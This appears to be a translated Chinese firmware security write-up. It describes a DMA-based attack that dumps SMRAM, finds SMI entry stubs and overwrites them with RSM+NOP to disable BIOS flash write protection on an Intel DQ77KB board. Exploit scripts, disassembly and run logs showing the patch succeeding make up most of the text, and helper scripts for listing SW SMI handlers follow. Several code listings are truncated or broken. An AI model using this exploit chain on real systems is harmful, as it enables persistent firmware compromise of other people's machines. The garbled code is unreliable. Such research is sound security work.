000080c0 87 6d 1c 33 e4 dd 8c cc 1c 40 d3 05 82 d6 3f a1 |.m.3.....@....?.|
000080d0 77 a2 ce 44 18 4f 72 b1 48 52 f9 ae 17 d2 75 fb |w..D.Or.HR....u.|
000080e0 16 7f 54 d8 40 88 de 0b 89 7f 19 1a 67 c9 cd fe |..T.@.......g...|
000080f0 45 3f 7f 98 54 89 d4 03 11 69 55 b1 c1 8c 1e 5c |E?..T....iU....\|

为了调查此问题的原因,我下载了QuarkBoard Support Package,其中包含UEFI兼容主板固件的开源实现。Quark BSP还有一些系统管理模式代码——它的功能非常有限,并且不支持x86_64系统,但是它仍然可以告诉我们一些有用的信息。下面是Quark BSP源代码中的 SMI入口点:

IA32FamilyCpuBasePkg/PiSmmCpuDxeSmm/Ia32/SmiEntry.asm_SmiEntryPoint PROC
DB 0bbh ; mov bx, imm16
DW offset _GdtDesc - _SmiEntryPoint + 8000h
DB 2eh, 0a1h ; mov ax, cs:[offset16]
dec eax
mov cs:[edi], eax ; mov cs:[bx], ax
DB 66h, 2eh, 0a1h ; mov eax, cs:[offset16]
mov cs:[edi + 2], ax ; mov cs:[bx + 2], eax
mov bp, ax ; ebp = GDT base
DB 66h
lgdt fword ptr cs:[edi] ; lgdt fword ptr cs:[bx]
DB 66h, 0b8h ; mov eax, imm32
gSmiCr3 DD ?
mov cr3, eax
DB 66h
mov eax, 020h ; as cr4.PGE is not set here, refresh cr3
mov cr4, eax ; in PreModifyMtrrs() to flush TLB.
DB 2eh, 0a1h ; mov ax, cs:[offset16]
mov cs:[edi - 2], eax ; mov cs:[bx - 2], ax
DB 66h, 0bfh ; mov edi, SMBASE
gSmbase DD ?
DB 67h
lea ax, [edi + (@32bit - _SmiEntryPoint) + 8000h]
mov cs:[edi - 6], ax ; mov cs:[bx - 6], eax
mov ebx, cr0
DB 66h
and ebx, 9ffafff3h
DB 66h
or ebx, 80000023h
mov cr0, ebx
DB 66h, 0eah
DD ?
DW ?
_GdtDesc FWORD ?

; 32-bit SMI handler code goes here

SMI处理程序在类似于实模式的16位环境中开始执行,上面列出的代码执行了执行环境的基本初始化,并跳转到32位保护模式,多数SMM的东西都在该模式下运行。 利用这些信息,我编写了一个Python程序,该程序通过16位代码存根来使用简单的签名在TSEG转储中查找SMI入口点:

import sys, os, struct

# 从SMRAM转储中提取SMI入口信息。
def find_smi_entry(data):

# 标准SMI入口存根签名
ptr = 0
sig = [ '\xBB', None, '\x80', # mov bx, 80XXh
'\x66', '\x2E', '\xA1', None, '\xFB', # mov eax, cs:dword_FBXX
'\x66', None, None, # mov edx, eax
'\x66', None, None ] # mov ebp, eax

while ptr < len(data):

found = True
for i in range(len(sig)):

# 在SMRAM的每100h偏移处检查签名
if sig[i] is not None and sig[i] != data[ptr + i]:

found = False

if found:

print 'SMI entry found at 0x%x' % ptr

ptr += 0x100

def main():

find_smi_entry(open(sys.argv[1], 'rb').read())
return 0

if __name__ == '__main__':



localhost ~ # python smi_entry.py TSEG.bin
SMI entry at 0x3f6800
SMI entry at 0x3f7000
SMI entry at 0x3f7800
SMI entry at 0x3f8000

下面是我的Intel DQ77KB主板上反汇编的SMI入口点:

; 16-bit SMI entry stub that enables protected mode
mov bx, 8091h ; Get GDT descriptor address
mov eax, cs:0FB48h ; Get physical address of new GDT
mov edx, eax
mov ebp, eax
add edx, 50h
mov [eax+42h], dx ; Initialize GDT entry
shr edx, 10h
mov [eax+44h], dl
mov [eax+47h], dh
mov ax, cs:0FB50h
dec ax
mov cs:[bx], ax ; Set GDT limit
mov eax, cs:0FB48h
mov cs:[bx+2], eax ; Set GDT physical address
db 66h
lgdt fword ptr cs:[bx] ; Switch to the new GDT
mov eax, 0D73CB000h
mov cr3, eax ; Set page directory base
mov eax, 668h
mov cr4, eax ; Enable PAE
mov ax, cs:0FB14h
mov cs:[bx+48h], ax ; Patch long mode jump with CS segment selector
mov ax, 10h
mov cs:[bx-2], ax ; Patch protected mode jump with CS segment selector
mov edi, cs:0FEF8h
lea eax, [edi+80DBh] ; Get 64-bit stub address
mov cs:[bx+44h], eax ; Patch long mode jump with given address
lea eax, [edi+8097h] ; Get 32-bit stub address
mov cs:[bx-6], eax ; Patch protected mode jump with given address
mov ecx, 0C0000080h ; IA32_EFER MSR number
mov ebx, 23h
mov cr0, ebx ; Enable protected mode
jmp large far ptr 10h:0D73F6897h ; Jump to the protected mode code

; 32-bit SMI entry stub that enables long mode
mov ax, 18h
mov ds, ax ; Update protected mode segment registers
mov es, ax
mov ss, ax
mov al, 1


xchg al, [ebp+8]
cmp al, 0
jz short loc_D73F68AE
jmp short loc_D73F68A3


mov eax, ebp
mov edx, eax
mov dl, 89h
mov [eax+45h], dl
mov eax, 40h
ltr ax
mov al, 0
xchg al, [ebp+8]
rdmsr ; Read current IA32_EFER MSR value
or ah, 1 ; Set long mode enabled flag
wrmsr ; Update IA32_EFER MSR value
mov ebx, 80000023h
mov cr0, ebx ; Enable paging
db 67h
jmp far ptr 38h:0D73F68DBh ; Jump to the long mode code

; 64-bit SMI entry stub that calls UEFI SMM foundation code
lea ebx, [edi+0FB00h]
mov ax, [rbx+16h]
mov ds, ax ; Update long mode segment registers
mov ax, [rbx+1Ah]
mov es, ax
mov fs, ax
mov gs, ax
mov ax, [rbx+18h]
mov ss, ax
mov rsp, 0D73D4FF8h
mov rcx, [rsp]
mov rax, 0D70044E4h
sub rsp, 208h
fxsave qword ptr [rsp] ; Save FPU registers
call rax ; sub_D70044E4() that does SMI handling stuff
add rsp, 20h
fxrstor qword ptr [rsp] ; Restore FPU registers

不幸的是,我还没有弄清楚为什么我的主板固件SMI入口点实际位于如此奇怪的偏移处,而不是根据所有公开可用的文档应该位于的0x8000。这可能与Sandy Bridge有某种关系,因为我的另一台具有相同硬件的测试系统(Apple MacBook Pro 10,2)也是一样的SMI偏移量。如果你有任何有关此问题的信息,请告诉我:)



# RSM + NOP patch for SMI entry
SMI_ENTRY_PATCH = '\x0F\xAA\x90'

def patch_smi_entry(smram_addr, smram_size):

ret = 0
modified_pages = {}

print '[+] Dumping SMRAM...'

# initialize exploit
expl = dma_expl.DmaExpl(smram_addr)


# read all SMRAM contents
data = expl.read(smram_size)

except Exception, e:


print '[+] Patching SMI entries...'

# find SMI handlers offsets
for ptr in find_smi_entry(data):

page_offs = ptr & 0xFFF
page_addr = ptr - page_offs

# get data for single memory page
if modified_pages.has_key(page_addr):

page_data = modified_pages[page_addr]


page_data = data[ptr : ptr + dma_expl.PAGE_SIZE]

# patch first instruction of SMI entry
page_data = page_data[: page_offs] + SMI_ENTRY_PATCH + \
page_data[page_offs + len(SMI_ENTRY_PATCH) :]

modified_pages[page_addr] = page_data
ret += 1

for page_addr, page_data in modified_pages.items():

# initialize exploit
expl = dma_expl.DmaExpl(smram_addr + page_addr)


# write modified page back to SMRAM

except Exception, e:


print '[+] DONE, %d SMI handlers patched' % ret

return ret

我编写一个名为patch_smi_entry.py的python程序,该程序可以接受SMRAM地址和大小为命令行参数,完成所有的工作并报告BIOS写入启用状态。 在正常运行的SMM代码上检查BIOS写保护:

localhost chipsec # python chipsec_util.py spi disable-wp

[CHIPSEC] Executing command 'spi' with args ['disable-wp']

[CHIPSEC] Trying to disable BIOS write protection..
[-] Couldn't disable BIOS region write protection in SPI flash
[CHIPSEC] (spi disable-wp) time elapsed 0.000


localhost ~ # python patch_smi_entry.py 0xd7000000 0x800000
[+] BIOS_CNTL is 0x2a
[!] Can't set BIOSWE bit, BIOS write protection is enabled
[+] Dumping SMRAM...
[+] Memory allocated at 0x7f614ee2b000
[+] Physical address is 0xc973f000
Pass 1: parsed user script and 109 library script(s) using 62172virt/36372res/4212shr/32972data kb, in 170usr/10sys/315real ms.
Pass 2: analyzed script: 1 probe(s), 14 function(s), 4 embed(s), 2 global(s) using 108876virt/84540res/5632shr/79676data kb, in 810usr/440sys/13062real ms.
Pass 3: translated to C into "/tmp/stapi26CgT/stap_06ba24e9748ef9297b5a524f191d9536_7942_src.c" using 108876virt/84684res/5776shr/79676data kb, in 190usr/50sys/251real ms.
Pass 4: compiled C into "stap_06ba24e9748ef9297b5a524f191d9536_7942.ko" in 3550usr/310sys/6154real ms.
Pass 5: starting run.
[+] SystemTap script started
[+] Reading physical memory 0xd7000000 - 0xd701dfff
[+] Reading physical memory 0xd701e000 - 0xd703bfff
[+] Reading physical memory 0xd703c000 - 0xd7059fff
[+] Reading physical memory 0xd705a000 - 0xd7077fff
[+] Reading physical memory 0xd7078000 - 0xd7095fff
[+] Reading physical memory 0xd7096000 - 0xd70b3fff
[+] Reading physical memory 0xd70b4000 - 0xd70d1fff
[+] Reading physical memory 0xd70d2000 - 0xd70effff
[+] Reading physical memory 0xd70f0000 - 0xd710dfff
[+] Reading physical memory 0xd710e000 - 0xd712bfff
[+] Reading physical memory 0xd712c000 - 0xd7149fff
[+] Reading physical memory 0xd714a000 - 0xd7167fff
[+] Reading physical memory 0xd7168000 - 0xd7185fff
[+] Reading physical memory 0xd7186000 - 0xd71a3fff
[+] Reading physical memory 0xd71a4000 - 0xd71c1fff
[+] Reading physical memory 0xd71c2000 - 0xd71dffff
[+] Reading physical memory 0xd71e0000 - 0xd71fdfff
[+] Reading physical memory 0xd71fe000 - 0xd721bfff
[+] Reading physical memory 0xd721c000 - 0xd7239fff
[+] Reading physical memory 0xd723a000 - 0xd7257fff
[+] Reading physical memory 0xd7258000 - 0xd7275fff
[+] Reading physical memory 0xd7276000 - 0xd7293fff
[+] Reading physical memory 0xd7294000 - 0xd72b1fff
[+] Reading physical memory 0xd72b2000 - 0xd72cffff
[+] Reading physical memory 0xd72d0000 - 0xd72edfff
[+] Reading physical memory 0xd72ee000 - 0xd730bfff
[+] Reading physical memory 0xd730c000 - 0xd7329fff
[+] Reading physical memory 0xd732a000 - 0xd7347fff
[+] Reading physical memory 0xd7348000 - 0xd7365fff
[+] Reading physical memory 0xd7366000 - 0xd7383fff
[+] Reading physical memory 0xd7384000 - 0xd73a1fff
[+] Reading physical memory 0xd73a2000 - 0xd73bffff
[+] Reading physical memory 0xd73c0000 - 0xd73ddfff
[+] Reading physical memory 0xd73de000 - 0xd73fbfff
[+] Reading physical memory 0xd73fc000 - 0xd7419fff
[+] Reading physical memory 0xd741a000 - 0xd7437fff
[+] Reading physical memory 0xd7438000 - 0xd7455fff
[+] Reading physical memory 0xd7456000 - 0xd7473fff
[+] Reading physical memory 0xd7474000 - 0xd7491fff
[+] Reading physical memory 0xd7492000 - 0xd74affff
[+] Reading physical memory 0xd74b0000 - 0xd74cdfff
[+] Reading physical memory 0xd74ce000 - 0xd74ebfff
[+] Reading physical memory 0xd74ec000 - 0xd7509fff
[+] Reading physical memory 0xd750a000 - 0xd7527fff
[+] Reading physical memory 0xd7528000 - 0xd7545fff
[+] Reading physical memory 0xd7546000 - 0xd7563fff
[+] Reading physical memory 0xd7564000 - 0xd7581fff
[+] Reading physical memory 0xd7582000 - 0xd759ffff
[+] Reading physical memory 0xd75a0000 - 0xd75bdfff
[+] Reading physical memory 0xd75be000 - 0xd75dbfff
[+] Reading physical memory 0xd75dc000 - 0xd75f9fff
[+] Reading physical memory 0xd75fa000 - 0xd7617fff
[+] Reading physical memory 0xd7618000 - 0xd7635fff
[+] Reading physical memory 0xd7636000 - 0xd7653fff
[+] Reading physical memory 0xd7654000 - 0xd7671fff
[+] Reading physical memory 0xd7672000 - 0xd768ffff
[+] Reading physical memory 0xd7690000 - 0xd76adfff
[+] Reading physical memory 0xd76ae000 - 0xd76cbfff
[+] Reading physical memory 0xd76cc000 - 0xd76e9fff
[+] Reading physical memory 0xd76ea000 - 0xd7707fff
[+] Reading physical memory 0xd7708000 - 0xd7725fff
[+] Reading physical memory 0xd7726000 - 0xd7743fff
[+] Reading physical memory 0xd7744000 - 0xd7761fff
[+] Reading physical memory 0xd7762000 - 0xd777ffff
[+] Reading physical memory 0xd7780000 - 0xd779dfff
[+] Reading physical memory 0xd779e000 - 0xd77bbfff
[+] Reading physical memory 0xd77bc000 - 0xd77d9fff
[+] Reading physical memory 0xd77da000 - 0xd77f7fff
[+] Reading physical memory 0xd77f8000 - 0xd77fffff
[+] DONE
[+] Patching SMI entries...
SMI entry found at 0x3f6000
SMI entry found at 0x3f6800
SMI entry found at 0x3f7000
SMI entry found at 0x3f7800
SMI entry found at 0x3f8000
[+] Memory allocated at 0x7f614a470000
[+] Physical address is 0x3ef092000
Pass 1: parsed user script and 109 library script(s) using 62176virt/36352res/4192shr/32976data kb, in 160usr/10sys/172real ms.
Pass 2: analyzed script: 1 probe(s), 14 function(s), 4 embed(s), 2 global(s) using 108880virt/84616res/5708shr/79680data kb, in 790usr/200sys/995real ms.
Pass 3: translated to C into "/tmp/stapEg28Q9/stap_b74b06d8681a8605cef014148ae17b5b_7943_src.c" using 108880virt/84744res/5836shr/79680data kb, in 180usr/60sys/237real ms.
Pass 4: compiled C into "stap_b74b06d8681a8605cef014148ae17b5b_7943.ko" in 3530usr/280sys/5236real ms.
Pass 5: starting run.
[+] SystemTap script started
[+] Writing physical memory 0xd73f6000 - 0xd73f6fff
[+] DONE
[+] Memory allocated at 0x7f614ee2b000
[+] Physical address is 0x3f3bcf000
Pass 1: parsed user script and 109 library script(s) using 62176virt/36284res/4124shr/32976data kb, in 160usr/10sys/173real ms.
Pass 2: analyzed script: 1 probe(s), 14 function(s), 4 embed(s), 2 global(s) using 108880virt/84532res/5628shr/79680data kb, in 790usr/200sys/995real ms.
Pass 3: translated to C into "/tmp/stapaurR1A/stap_f296db5c81c5158e1ac0e155bbaaf3b6_7943_src.c" using 108880virt/84660res/5756shr/79680data kb, in 180usr/60sys/233real ms.
Pass 4: compiled C into "stap_f296db5c81c5158e1ac0e155bbaaf3b6_7943.ko" in 3530usr/260sys/6606real ms.
Pass 5: starting run.
[+] SystemTap script started
[+] Writing physical memory 0xd73f7000 - 0xd73f7fff
[+] DONE
[+] Memory allocated at 0x7f614a470000
[+] Physical address is 0x3ef096000
Pass 1: parsed user script and 109 library script(s) using 62176virt/36396res/4236shr/32976data kb, in 160usr/10sys/172real ms.
Pass 2: analyzed script: 1 probe(s), 14 function(s), 4 embed(s), 2 global(s) using 108880virt/84656res/5752shr/79680data kb, in 790usr/200sys/997real ms.
Pass 3: translated to C into "/tmp/stapXeWg7I/stap_5ab1311d1369a5f00c3287bf44fa61aa_7943_src.c" using 108880virt/84784res/5880shr/79680data kb, in 190usr/50sys/236real ms.
Pass 4: compiled C into "stap_5ab1311d1369a5f00c3287bf44fa61aa_7943.ko" in 3530usr/270sys/4677real ms.
Pass 5: starting run.
[+] SystemTap script started
[+] Writing physical memory 0xd73f8000 - 0xd73f8fff
[+] DONE
[+] DONE, 4 SMI handlers patched
[+] BIOS_CNTL is 0x2a
[+] BIOSWE bit was set, BIOS write protection is disabled now


localhost chipsec # python chipsec_util.py spi disable-wp

[CHIPSEC] Executing command 'spi' with args ['disable-wp']

[CHIPSEC] Trying to disable BIOS write protection..
[+] BIOS region write protection is disabled in SPI flash
[CHIPSEC] (spi disable-wp) time elapsed 0.000

请注意,在运行DMA攻击代码之前,你还需要运行 CHIPSEC的 boot_script_table模块来利用UEFI启动脚本表漏洞并禁用TSEGMB保护,在其他情况下——如在正确锁定了SMRAM的读写区域时,执行patch_smi_entry.py或dma_expl.py可能会导致意外行为(比如系统被冻结)。 为了更方便地在我的测试硬件上处理这种攻击,我在USB闪存驱动器上安装了带有正确配置内核的Gentoo Linux,并把CHIPSEC代码和所有必要的东西都备份在里面了。


我的Apple MacBook Pro 10,2(也有UEFI启动脚本表漏洞)不受SMI入口点修改程序的影响,因为它使用BIOS保护区域寄存器(完全不依赖SMM),而不是用BIOS_CNTL来实现闪存写保护。但是,dma_expl.py程序支持此Apple硬件,并且我能转储它的SMRAM中的内容,这对于其他研究目的(例如SMM代码的安全审计)可能很有用。


不久前,有两篇关于SMM代码漏洞的类似工作:Intel Security的“A New Class of Vulnerabilities in SMI Handlers”和LegbaCore的“How Many Million BIOSes Would you Like to Infect?”。这些作者发现了SMI软件处理程序中的许多漏洞,这些漏洞是通过固件代码使用EFI_SMM_SW_DISPATCH2_PROTOCOL注册的,操作系统可以通过将处理程序编号写入AMPC I/O端口B2h来触发此类处理程序。 为了检查我的机器的SMM代码是否存在此类漏洞,我还写了两个Python脚本,用来转储的SMRAM内容,并找到所有已注册的SW SMI处理程序及其编号。也许你会发现它很有用。 在Intel DQ77KB中:

Extract SW SMI handlers information from SMRAM dump.

$ python smi_handlers.py TSEG.bin
0xcc: 0xd70259d8
0xb8: 0xd706673c
0xba: 0xd706e970
0x05: 0xd706b474
0x04: 0xd706b45c
0x03: 0xd706b2e0
0x01: 0xd706b2dc
0xa1: 0xd70664c4
0xa0: 0xd706636c
0x40: 0xd70254f8

import sys, os, struct

def main():

path = sys.argv[1]
data = open(path, 'rb').read()

for i in range(len(data)):

# get range from string
data_at = lambda offs, size: data[i + offs : i + offs + size]

# 00: "SMIH"
# 04: handler address (qword)
# 0c: SW SMI value (byte)
if data_at(0, 4) == 'SMIH':

addr, val = struct.unpack('QB', data_at(4, 8 + 1))

if val != 0 and addr < 0xffffffff:

print '0x%.2x: 0x%.8x' % (val, addr)

if __name__ == '__main__':


在Apple MacBookPro 10,2中:

Extract SW SMI handlers information from SMRAM dump.

$python smi_handlers.py TSEG.bin
0x25: 0x893aaca0
0x48: 0x893a3170
0x01: 0x893a831c
0x05: 0x893a7fa0
0x03: 0x893a7e46
0xf1: 0x893a7dd5
0xf0: 0x893a7b76

import sys, os, struct

def main():

path = sys.argv[1]
data = open(path, 'rb').read()

for i in range(len(data)):

# get range from string
data_at = lambda offs, size: data[i + offs : i + offs + size]

# 00: "DBRC"
# 68: handler address (qword)
# 70: SW SMI value (byte)
if data_at(0, 4) == 'DBRC':

addr = struct.unpack('Q', data_at(0x68, 8))[0]
val = struct.unpack('B', data_at(0x70, 1))[0]

if val != 0 and addr < 0xffffffff:

print '0x%.2x: 0x%.8x' % (val, addr)

if __name__ == '__main__':

